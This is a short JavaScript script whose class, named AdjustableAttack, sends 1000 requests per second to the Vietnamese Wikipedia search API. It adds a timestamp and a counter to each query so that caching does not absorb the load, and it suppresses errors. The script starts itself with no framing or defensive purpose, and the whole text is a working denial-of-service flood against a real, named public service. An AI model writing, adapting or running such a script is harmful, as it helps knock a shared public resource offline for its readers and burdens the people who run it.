class AdjustableAttack {
    constructor() {
        this.requestsPerSecond = 1000;
        this.active = true;
    }
    
    fire() {
        for(let i = 0; i < this.requestsPerSecond; i++) {
            fetch(`https://vi.wikipedia.org/w/api.php?action=query&format=json&origin=*&list=search&srsearch=spam${Date.now()}${i}`)
            .catch(()=>{});
        }
    }
    
    start() {
        setInterval(() => this.fire(), 1000);
    }
    
    setRate(rate) {
        this.requestsPerSecond = rate;
    }
}

const attack = new AdjustableAttack();
attack.start();

attack.setRate(1000);
